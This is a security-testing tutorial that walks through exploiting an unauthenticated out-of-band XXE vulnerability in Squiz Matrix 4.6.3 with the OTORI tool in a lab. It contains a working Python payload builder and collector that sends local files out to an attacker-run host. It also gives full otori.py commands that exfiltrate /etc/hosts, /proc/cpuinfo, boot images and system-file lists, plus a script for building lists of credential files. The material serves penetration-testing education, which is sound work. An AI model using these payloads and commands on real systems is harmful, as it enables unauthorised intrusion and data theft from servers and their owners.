[ Beneath the Waves ]

OTORI - Example 2: Squiz Matrix

article by Ben Lincoln

 

This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.

The instructions in this tutorial are slightly less detailed than for other articles on this website. This is because the software described should not be used unless you are comfortable with basic- to intermediate-level use of Linux. Proceeding without that knowledge is very likely to result in damage and/or loss of data.

Squiz Matrix is one of many open-source content-management systems available today. According to its creators, its focus is on people who work in marketing.

From an XXE perspective, Squiz Matrix is interesting because the vulnerable version can be exploited without authentication, and because it is a PHP-based application it can be used to retrieve binary content (although the file size is limited to about 2 KiB unless it was built in an unusual way).

Exploiting Squiz Matrix requires the kind of out-of-band XXE techniques described by Timur Yunusov and Alexey Osipov at Black Hat EU 2013[1].

Important: the modules described below stop working against Squiz Matrix if the system-level libxml2 library is too new. The change appears to have been made in early June 2014 in Ubuntu's libxml2 package, and is noted as being intended to address CVE-2014-0191. The instructions below include a step to downgrade the library in question. If you find an instance that is not vulnerable during a real pen-test, the underlying OS has probably had its libraries patched.
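To make the out-of-band pattern referred to above concrete, here is an added illustration of the generic Yunusov/Osipov building blocks. It is not code from OTORI, SWAMM or Squiz Matrix, it is not the request any of the modules below send, and the host names, the `?d=` parameter and the file paths in it are placeholders. The document handed to the parser only pulls in an attacker-hosted DTD; that DTD reads a local file through PHP's `php://filter` base64 wrapper (so binary content survives) and then makes the parser request the attacker's collector with the base64 riding in the URL; the collector decodes it back to bytes.

```python
"""Out-of-band XXE building blocks in the style Yunusov and Osipov described.

Added illustration only: not code from OTORI, SWAMM or Squiz Matrix, and it
encodes no application-specific request. Host names, the "?d=" parameter and
the file paths are placeholders chosen for this example.

  1. build_xml()    - document submitted to a parser that resolves external
                      entities; it only pulls in a remote DTD.
  2. build_dtd()    - the attacker-hosted DTD. It makes the parser read a local
                      file through php://filter/read=convert.base64-encode and
                      then fetch http://<collector>/?d=<base64> from the
                      attacker's host.
  3. decode_exfil() - what the collector does with that request target.
"""
import base64
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlparse

OUTPUT_FILE = "exfiltrated.bin"  # the collector appends decoded bytes here


def build_xml(dtd_url: str) -> str:
    """Document sent to the target. %remote; loads the DTD, %int; defines
    %send (the &#x25; in the DTD becomes % when %int is expanded), and
    %send; triggers the outbound request. The element content is irrelevant."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        f'  <!ENTITY % remote SYSTEM "{dtd_url}">\n'
        "  %remote;\n"
        "  %int;\n"
        "  %send;\n"
        "]>\n"
        "<data/>\n"
    )


def build_dtd(target_path: str, collector_url: str) -> str:
    """Attacker-hosted DTD. A parameter-entity reference inside an entity
    value (the %file; below) is only permitted in an external DTD, which is
    why this text is served from the attacker's host, not embedded in the
    document itself."""
    wrapper = f"php://filter/read=convert.base64-encode/resource={target_path}"
    return (
        f'<!ENTITY % file SYSTEM "{wrapper}">\n'
        '<!ENTITY % int "<!ENTITY &#x25; send SYSTEM '
        f"'{collector_url}?d=%file;'>\">\n"
    )


def expected_request(collector_url: str, file_bytes: bytes) -> str:
    """The request target a parser would issue once %send; is expanded:
    the base64 of the file travels inside the URL."""
    return collector_url + "?d=" + base64.b64encode(file_bytes).decode("ascii")


def decode_exfil(request_target: str, param: str = "d") -> bytes:
    """Recover the file bytes from the request the collector receives."""
    query = urlparse(request_target).query
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == param:
            raw = unquote(value)              # not unquote_plus: '+' is base64 data
            raw += "=" * (-len(raw) % 4)      # restore padding if the parser dropped it
            return base64.b64decode(raw, validate=True)
    raise ValueError("request carries no exfiltrated data")


class Collector(BaseHTTPRequestHandler):
    """Minimal listener: decode each request and append the bytes to a file."""

    def do_GET(self):
        try:
            data = decode_exfil(self.path)
        except (ValueError, binascii.Error):
            self.send_error(404)
            return
        with open(OUTPUT_FILE, "ab") as out:
            out.write(data)
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    collector = "http://swamm.vuln.local:8080/"  # placeholder collector host
    print(build_xml(collector + "ev.dtd"))
    print(build_dtd("/etc/hosts", collector))
    HTTPServer(("0.0.0.0", 8080), Collector).serve_forever()
```

Run stand-alone it prints the two artefacts and then listens on port 8080; anything decodable that arrives is appended to `exfiltrated.bin`. The pieces a real tool adds on top of this are exactly what SWAMM's random URI prefixes and OTORI's modules provide: per-request routing on the collector side and the application-specific way of getting the document in front of the parser.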

Test Environment Systems

You'll need 2-3 systems for this exercise:

  1. The attacker/pen-testing system. This is where On The Outside, Reaching In will run. This tutorial was written and tested using a vanilla Debian 7 x64 VM, as well as a Kali Linux 1.0 x64 VM for this role. Both were patched at the current level when this document was written.
  2. The system where She Wore A Mirrored Mask will run. This can be the same as the first system, or you can use a separate system to simulate running She Wore A Mirrored Mask on a previously-compromised system on the target network. This tutorial was written and tested with the first two roles being held by the same system.
  3. The target system. This tutorial was written and tested using Ubuntu 12.04 x64 for this role.

I strongly recommend that you build VMs specifically for this testing, or at least snapshot existing VMs before you begin, so that if something goes wrong, you won't lose any data/work. This software is a pre-alpha preview of a tool designed for penetration testing (in other words, it actively misuses its target(s)). Take appropriate safety precautions.

Test Environment Setup

Setting up the attacking system is easy — just unpack the current release of On The Outside, Reaching In. If you are running She Wore A Mirrored Mask on a separate system, you'll want to unpack that too.

The target system will take more effort, as Squiz Matrix is a bit of a chore to set up. The following instructions should get you up and running if you're using Ubuntu 12.04 x64 as the base OS. On any other OS you will pretty much be on your own, due to the large number of dependencies required. I really recommend that you build an Ubuntu 12.04 VM specifically to install Squiz Matrix on, as there are a number of aspects of the configuration that will make it difficult to host anything else on it.

Screenshots of key steps are below the list of instructions.

  1. Edit your /etc/hosts files (or your DNS server configuration) to add at least one entry which maps a distinct FQDN (e.g. squiztarget.vuln.local) to a non-loopback address for your target server. You will need to do this on both your target system and your attacking system. Squiz Matrix will fail to install correctly if this is not done on the target system, and it will not honour requests from the attacking system unless they include the same name in the HTTP Host header. The installation will also fail if you use the loopback address (127.0.0.1) for these entries instead of a network-accessible IP.
  2. Install any missing OS-level prerequisites using the following command:

     

    sudo apt-get install autoconf automake bison build-essential cvs flex gcc g++ libtool m4 make wget postgresql apache2-mpm-prefork php5 libapache2-mod-php5 php5-gd php5-pgsql php-pear

  3. Install any missing PHP prerequisites using the following command:

     

    sudo pear install Auth_SASL DB Archive_Tar Mail Mail_Mime Mail_mimeDecode Mail_Queue XML_HTMLSax XML_Parser XML_RPC XML_Tree Text_Diff HTTP HTTP_Request HTTP_Client Net_URL Image_Graph-0.7.2 Image_Color Image_Canvas-0.3.1 Math_Stats-0.8.5 Net_SMTP Net_Socket Numbers_Roman Numbers_Words-0.16.4 I18N_UnicodeNormalizer Services_JSON MDB2 pear/MDB2#pgsql

  4. Downgrade to a version of libxml2 which causes Squiz Matrix to still be vulnerable:

     

    sudo apt-get install libxml2=2.7.8.dfsg-5.1ubuntu4

    (I know that versions as recent as 2.7.8.dfsg-5.1ubuntu4.6 are vulnerable, but they're not in the standard repository).
  5. Download the Squiz Matrix checkout script using the following commands:

     

    wget "http://public-cvs.squiz.net/cgi-bin/viewcvs.cgi/*checkout*/mysource_matrix/scripts/dev/checkout.sh"

    chmod +x checkout.sh

  6. Use the checkout script to obtain version 4.6.3 (the last version vulnerable to the methods described below):

     

    ./checkout.sh mysource_4-6-3 "squiz_matrix_4.6.3"

    (note: you will get a few errors indicating "no such tag mysource_4-6-3"; this is because those components did not exist when 4.6.3 was released.)
  7. Optionally, create an archive of this version in case the CVS repository is deleted in the future:

     

    tar -cjvf "squiz_matrix_4.6.3.tar.bz2" squiz_matrix_4.6.3

  8. Switch context to the PostgreSQL user:

     

    sudo su

    su postgres

  9. Create the two Squiz Matrix database users:

     

    createuser -SRDU postgres matrix

    createuser -SRDU postgres matrix_secondary

    Note that these commands will create these users with empty passwords. This is very bad, but it is word-for-word from the official Squiz Matrix installation guide. We'll be fixing that shortly.
  10. Create the Squiz Matrix database and add support for the PLPGSQL language to it:

     

    createdb -U postgres -O matrix -E UTF8 squiz_matrix

    createlang -U postgres plpgsql squiz_matrix

  11. If you are using PostgreSQL 9.0 or higher (you probably are, but can review the apt-get output from previous steps to verify this), enter the following sequence of commands to launch the psql CLI, enable a special flag, and set the password for the two PostgreSQL users you created previously. Of course, you should use different passwords:

     

    psql

    ALTER DATABASE squiz_matrix SET bytea_output TO 'escape';

    ALTER USER matrix WITH PASSWORD '2737ae7431508912302bf3513c0189bf';

    ALTER USER matrix_secondary WITH PASSWORD '6152d75ceb00a4f82368fc8fdaa41618';

    \q

  12. Execute the exit command twice to leave the context of the postgres and root accounts:

     

    exit

    exit

  13. cd into the directory where you downloaded the Squiz Matrix files (e.g. ~/squiz_matrix_4.6.3 if you followed the commands above exactly).
  14. Execute the following command to perform the first step of the installation. Be sure to replace the path with the actual path where you unpacked the files!

     

    php install/step_01.php /home/squiz/squiz_matrix_4.6.3

  15. Edit the file data/private/conf/main.inc using your favourite text-editor.
    1. Locate the SQ_CONF_SYSTEM_ROOT_URLS definition and update it to include the FQDN you set up in your /etc/hosts file (or DNS server).
    2. Locate the SQ_CONF_DEFAULT_EMAIL definition and update it to include an email address at the FQDN you set up in your /etc/hosts file (or DNS server). I used squiz@squiztarget.vuln.local.
    3. Locate the SQ_CONF_TECH_EMAIL definition and update it to include an email address at the FQDN you set up in your /etc/hosts file (or DNS server). I used squiz@squiztarget.vuln.local.
    Save the file and exit.
  16. Edit the file data/private/conf/db.inc using your favourite text-editor.
    1. For all three entries, specify pgsql:dbname=squiz_matrix; host=localhost for the DSN.
    2. For all three entries, specify pgsql for the type.
    3. For the first and second entries, specify matrix for the user.
    4. For the third entry, specify matrix_secondary for the user.
    5. Specify the corresponding passwords that you set previously for those two users.
    Save the file and exit.
  17. Execute the following command to perform the second step of the installation. Be sure to replace the path with the actual path where you unpacked the files!

     

    php install/step_02.php /home/squiz/squiz_matrix_4.6.3

  18. Execute the following commands to perform the next steps of the installation. Be sure to replace the path with the actual path where you unpacked the files!

     

    php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3

    php install/step_03.php /home/squiz/squiz_matrix_4.6.3

    php install/compile_locale.php /home/squiz/squiz_matrix_4.6.3

  19. Execute the following commands to make your Squiz Matrix installation pretty insecure, but in the process give the Apache user the write access it needs:

     

    chmod --recursive o+w cache

    chmod --recursive o+w data

  20. Edit your Apache httpd site configuration using your favourite text-editor. If you have been following these instructions exactly, this will be the file /etc/apache2/sites-enabled/000-default. You can refer to the screenshots at the end of this section for guidance. You will want to paste in the following content, replacing all occurrences of /home/squiz/squiz_matrix_4.6.3 with the actual installation directory you put Squiz Matrix in, and replacing squiztarget.vuln.local with the appropriate FQDN if you used something else.

     

    <VirtualHost *:80>
        ServerName squiztarget.vuln.local
        ServerAdmin webmaster@localhost
        DocumentRoot /home/squiz/squiz_matrix_4.6.3/core/web
        Options -Indexes FollowSymLinks

        <Directory /home/squiz/squiz_matrix_4.6.3>
            Order deny,allow
            Deny from all
        </Directory>

        <DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/(core/(web|lib)|data/public|fudge)">
            Order allow,deny
            Allow from all
        </DirectoryMatch>

        <DirectoryMatch "^/home/squiz/squiz_matrix_4.6.3/data/public/assets">
            SetHandler default-handler
        </DirectoryMatch>

        <FilesMatch "\.inc$">
            Order allow,deny
            Deny from all
        </FilesMatch>

        <LocationMatch "/(CVS|\.FFV)/">
            Order allow,deny
            Deny from all
        </LocationMatch>

        Alias /__fudge /home/squiz/squiz_matrix_4.6.3/fudge
        Alias /__data /home/squiz/squiz_matrix_4.6.3/data/public
        Alias /__lib /home/squiz/squiz_matrix_4.6.3/core/lib
        Alias / /home/squiz/squiz_matrix_4.6.3/core/web/index.php/
    </VirtualHost>

  21. Save the file and exit.
  22. Restart Apache httpd, e.g.:

     

    sudo /etc/init.d/apache2 restart

  23. Attempt to access the Squiz Matrix web interface using your browser. For example, if you have followed the steps above exactly, then the URL would be http://squiztarget.vuln.local/. If the installation was successful, you should see a brief "MySource Notice" error (no, really).
  24. Assuming you were successful in installing the software, proceed to the web admin interface (the base URL with _admin/ appended, e.g. http://squiztarget.vuln.local/_admin/).
  25. If the page loads correctly, you can log in with username root and password root. Full use of the Squiz Matrix web interface requires that you have a Java plugin for your browser. If the left pane is blank grey, it's because you don't have one. You will also likely receive some annoying nag popups regarding your non-ancient JRE version and that you need to allow popups for the admin interface to work.
  26. Even though this is a training environment, you should change the password for the root user:
    1. In the left pane, click the My Space tab.
    2. Click the My Details link.
    3. Click the Acquire Lock(s) button.
    4. Enter the new root user password in both of the text boxes, then click the Commit button at the bottom of the page.

Yay! You're done! Unless you got some errors, in which case you'll need to do some web searches.

Test Environment Setup - Screenshots
[ Squiz Matrix main.inc file ]
[ Squiz Matrix db.inc file ]
[ A sign that the installation has succeeded ]
[ Squiz Matrix admin logon page ]
[ Squiz Matrix admin interface (no Java plugin) ]
[ Squiz Matrix admin interface (with Java plugin) ]
[ You'll get to know this warning very well ]
[ ...as well as this one ]
[ Navigating to the password change section (1/2) ]
[ Navigating to the password change section (2/2) ]

Illustrations related to the preceding section.

 

Preparing to Exploit Squiz Matrix

In contrast to the ordeal of setting up the simulated target system, exploiting Squiz Matrix 4.6.3 is ridiculously easy when using On The Outside, Reaching In. All you need to know in order to proceed to the next section is the web administration URL for the target Squiz Matrix instance. For example, if you followed the steps in the previous section exactly, that would be http://squiztarget.vuln.local/_admin/.

That's right - you don't even need a web browser — let alone an intercepting proxy — if you know the URL in question.

SOS-12-007-YU-OOB - Fully Out-Of-Band Data Exfiltration Module

SOS-12-007-YU-OOB is the most effective of the three Squiz Matrix-related modules, so if you only read one section of this tutorial, it should be this one.

For purposes of this tutorial, assume that swamm.vuln.local is the machine name for the attacking system running She Wore A Mirrored Mask. If you are using a different name, or an IP address, substitute that as necessary. The name or IP you use must be defined and accessible to the target system as well as the attacking system. That is, if you have defined swamm.vuln.local in the /etc/hosts file on your attacking system, you must also define it in the /etc/hosts file on the simulated target system.

  1. cd into the directory where you unpacked She Wore A Mirrored Mask and launch it:

     

    python ./swamm.py

  2. When executed with no additional parameters, She Wore A Mirrored Mask will default to the following options:
    • Listen on port 8080 on all interfaces.
    • Use unencrypted HTTP (no TLS/SSL).
    • Pretend to be an instance of Apache Coyote 1.1.
    All three of these options can be customized - see OTORI - Instructions.
  3. In addition, seven options are randomly generated. These are the special URI stems which expose the hidden functionality of She Wore A Mirrored Mask. You will need to make a note of these in order to pass them to On The Outside, Reaching In. I have noted the values that were generated while writing this tutorial — you will need to replace those as necessary in the commands that you execute with the values generated when you launched She Wore A Mirrored Mask. It is possible to force the use of specific values for these parameters if you have a good reason to do so (see OTORI - Instructions).
    When I wrote this tutorial, the values generated for my She Wore A Mirrored Mask instance were:
    1. Base prefix: /CBt/
    2. Read prefix: /CBt/3lh/
    3. Write prefix: /CBt/moc/
    4. Append prefix: /CBt/n4Y/
    5. Delete prefix: /CBt/Qyv/
    6. Stored pair add prefix: /CBt/BmF/
    7. Stored pair delete prefix: /CBt/hpB/
  4. Verify that you have all of the parameters correct by obtaining the /proc/cpuinfo file from the Squiz Matrix server. You will call On The Outside, Reaching In with the URI for that file, the web administration URL for Squiz Matrix as the only module argument, and all of the She Wore A Mirrored Mask URLs. The She Wore A Mirrored Mask URLs must be provided as the full URL. This is to allow maximum flexibility in case the attacking system and the target system use different names for the server where She Wore A Mirrored Mask is running.

     

    python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///proc/cpuinfo" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

  5. If this works, then take advantage of the fact that Squiz Matrix is PHP-based by exfiltrating a binary file instead of a text file. How about /boot/grub/boot.img?

     

    python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///boot/grub/boot.img" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

  6. Unlike Java-based applications, where a file:/// URI that points at a directory returns a listing of its contents, PHP will not return directory listings, so you cannot simply browse the target's filesystem. However, On The Outside, Reaching In supports reading a list of URIs from a file, and includes a number of such files in the lists directory. For example, to retrieve a number of files which are potentially useful for "footprinting" (or even compromising) a target system:

    python ./otori.py --clone --module "SOS-12-007-YU-OOB" --module-options "http://squiztarget.vuln.local/_admin/" --exacturilist "lists/linux-system_information.txt" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

In many cases, you will need to obtain further information about the system and use that to construct targeted lists. For example, perhaps there is a web interface to another component on the system which tells you that its base installation directory is /opt/some_server_18.2.3/. You could download the installer for that software to a test VM, unpack it, and figure out what its interesting contents might be (e.g. conf/database_connection_string.xml), and then map that relative path onto the known base path for the real target server.
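The mapping described in the two paragraphs above (no directory listings from PHP, so build a list from a local unpacked copy and rebase it onto the path the target revealed) is mechanical enough to script. The following is an added example and not part of OTORI; it assumes that OTORI's list files hold one file:// URI per line (the bundled lists are not reproduced here), that percent-encoding odd characters in names is acceptable to the consumer, and the paths used are placeholders.

```python
"""Turn an unpacked local copy of a product into a targeted file:// URI list.

Added example, not part of OTORI. Assumptions: OTORI list files hold one
file:// URI per line; names outside the unreserved URI characters are
percent-encoded; the paths used are placeholders.
"""
import re
from pathlib import Path
from typing import Iterable, List
from urllib.parse import quote

# File names that tend to carry credentials, connection strings or keys.
INTERESTING = re.compile(
    r"\.(xml|conf|cfg|ini|properties|inc|ya?ml|json|key|pem|env)$"
    r"|(^|/)\.ht(access|passwd)$"
    r"|pass|secret|credential|database",
    re.IGNORECASE,
)


def candidate_relpaths(local_root, max_files: int = 500) -> List[str]:
    """Relative POSIX paths under local_root whose names look interesting.
    Symlinks are skipped so a looped tree cannot inflate the list."""
    root = Path(local_root)
    found = []
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if INTERESTING.search(rel):
            found.append(rel)
    return found[:max_files]


def to_file_uris(relpaths: Iterable[str], target_base: str) -> List[str]:
    """Map relative paths onto the target's base directory as file:// URIs."""
    base = target_base.rstrip("/")
    return [f"file://{base}/{quote(rel, safe='/')}" for rel in relpaths]


def write_list(uris: Iterable[str], out_path) -> int:
    """Write one URI per line (assumed list format) and return the count."""
    uris = list(uris)
    Path(out_path).write_text("\n".join(uris) + "\n", encoding="utf-8")
    return len(uris)


if __name__ == "__main__":
    import argparse

    ap = argparse.ArgumentParser(description="build a targeted --exacturilist file")
    ap.add_argument("local_root", help="directory where you unpacked the installer")
    ap.add_argument("target_base", help="base path on the target, e.g. /opt/some_server_18.2.3")
    ap.add_argument("-o", "--out", default="lists/targeted.txt")
    args = ap.parse_args()
    uris = to_file_uris(candidate_relpaths(args.local_root), args.target_base)
    print(f"wrote {write_list(uris, args.out)} URIs to {args.out}")
```

The resulting file is passed with `--exacturilist` in place of the bundled list in the command above. Tune `INTERESTING` to the product: for the hypothetical /opt/some_server_18.2.3/ example it would pick up conf/database_connection_string.xml, and adding the product's own log and backup naming conventions usually pays off more than a longer generic pattern.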

SOS-12-007-YU-OOB - Screenshots
[ SWAMM startup ]
[ /proc/cpuinfo exfiltrated ]
[ /boot/grub/boot.img exfiltrated ]
[ A variety of system information from /proc and /etc ]

Illustrations related to the preceding section.

 

SOS-12-007-YU-404 - Reference To Nonexistent Page/Error-Reflection (Base64-Encoded) Module

This module works in virtually the same way as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:

 

python ./otori.py --clone --module "SOS-12-007-YU-404" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

SOS-12-007-YU-IU - Reference To Invalid URI/Error-Reflection (Non-Base64-Encoded) Module

This module is included for purposes of showing the different ways that the actual vulnerability in Squiz Matrix can be exploited (for those who are interested in writing their own modules). It is not recommended for general use (partly because unlike the previous two, it cannot retrieve binary content), but uses the same syntax as SOS-12-007-YU-OOB. For example, to retrieve the /etc/hosts file:

 

python ./otori.py --clone --module "SOS-12-007-YU-IU" --module-options "http://squiztarget.vuln.local/_admin/" --singleuri "file:///etc/hosts" --outputbase "./output/squiz" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs --swamm-url-base "http://swamm.vuln.local:8080/CBt/" --swamm-url-read "http://swamm.vuln.local:8080/CBt/3lh/" --swamm-url-write "http://swamm.vuln.local:8080/CBt/moc/" --swamm-url-append "http://swamm.vuln.local:8080/CBt/n4Y/" --swamm-url-delete "http://swamm.vuln.local:8080/CBt/Qyv/" --swamm-url-store-add "http://swamm.vuln.local:8080/CBt/BmF/" --swamm-url-store-delete "http://swamm.vuln.local:8080/CBt/hpB/"

 
Footnotes
1. See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding Black Hat EU 2013 presentation by the same authors.
2. The following versions of Pear-installed components were used when writing this tutorial:
Archive_Tar [was installed by default]
Auth_SASL DB: 1.0.6
HTTP: 1.4.1
HTTP_Client: 1.2.1
HTTP_Request: 1.4.4
I18N_UnicodeNormalizer: 1.0.0
Image_Canvas: 0.3.1
Image_Color: 1.0.4
Image_Graph: 0.7.2
Mail: 1.2.0
Mail_Mime: 1.8.9
Mail_mimeDecode: 1.5.5
Mail_Queue: 1.2.7
Math_Stats: 0.8.5
MDB2: 2.4.1
MDB2_Driver_pgsql: 1.4.1
Net_SMTP: 1.6.2
Net_Socket: 1.0.14
Net_URL: 1.0.15
Numbers_Roman: 1.0.2
Numbers_Words: 0.16.4
Services_JSON: 1.0.3
Text_Diff: 1.1.1
XML_HTMLSax: 2.1.2
XML_Parser: 1.3.4
XML_RPC: 1.5.5
XML_Tree: 1.1